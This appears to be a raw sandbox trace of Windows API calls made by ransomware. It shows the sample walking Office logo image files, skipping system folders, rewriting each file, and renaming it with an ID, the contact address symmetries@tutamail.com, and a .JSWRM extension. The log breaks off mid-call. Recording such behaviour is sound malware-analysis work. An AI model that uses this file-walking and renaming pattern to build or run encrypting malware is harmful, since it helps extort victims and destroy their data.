(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.543] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe66, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.scale-140.png", cAlternateFileName="OU7C59~1.PNG")) returned 1 [0133.543] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2=".") returned 1 [0133.543] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="..") returned 1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="...") returned 1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="windows") returned -1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="recovery") returned -1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="perflogs") returned -1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="documents and settings") returned 1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="system volume information") returned -1 [0133.544] lstrcmpiW (lpString1="OutlookLogo.scale-140.png", lpString2="msocache") returned 1 [0133.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0133.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x241290, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0133.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.545] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3686) returned 1 [0133.545] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.545] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe60, lpOverlapped=0x0) returned 1 [0133.546] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.546] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe60, lpOverlapped=0x0) returned 1 [0133.547] CloseHandle (hObject=0x238) returned 1 [0133.547] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.548] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1155, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.scale-180.png", cAlternateFileName="OUC9ED~1.PNG")) returned 1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2=".") returned 1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="..") returned 1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="...") returned 1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="windows") returned -1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="recovery") returned -1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="perflogs") returned -1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="documents and settings") returned 1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="system volume information") returned -1 [0133.548] lstrcmpiW (lpString1="OutlookLogo.scale-180.png", lpString2="msocache") returned 1 [0133.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x241100, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0133.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x240fc0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0133.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.549] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4437) returned 1 [0133.549] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.549] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1150, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1150, lpOverlapped=0x0) returned 1 [0133.580] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.580] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1150, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1150, lpOverlapped=0x0) returned 1 [0133.581] CloseHandle (hObject=0x238) returned 1 [0133.581] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.582] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.scale-80.png", cAlternateFileName="OU52E3~1.PNG")) returned 1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2=".") returned 1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="..") returned 1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="...") returned 1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="windows") returned -1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="recovery") returned -1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="perflogs") returned -1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="documents and settings") returned 1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="system volume information") returned -1 [0133.582] lstrcmpiW (lpString1="OutlookLogo.scale-80.png", lpString2="msocache") returned 1 [0133.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0133.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x240ef8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0133.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0133.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x241010, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0133.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.584] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2389) returned 1 [0133.584] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.584] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x950, lpOverlapped=0x0) returned 1 [0133.585] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.585] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x950, lpOverlapped=0x0) returned 1 [0133.586] CloseHandle (hObject=0x238) returned 1 [0133.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.587] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ec, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-black_scale-100.png", cAlternateFileName="OU0B90~1.PNG")) returned 1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.587] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.588] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2028) returned 1 [0133.588] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.588] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.590] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.590] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.590] CloseHandle (hObject=0x238) returned 1 [0133.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.591] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-black_scale-140.png", cAlternateFileName="OU396E~1.PNG")) returned 1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.591] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.592] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2258) returned 1 [0133.592] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.593] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0133.595] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.595] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0133.595] CloseHandle (hObject=0x238) returned 1 [0133.595] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft 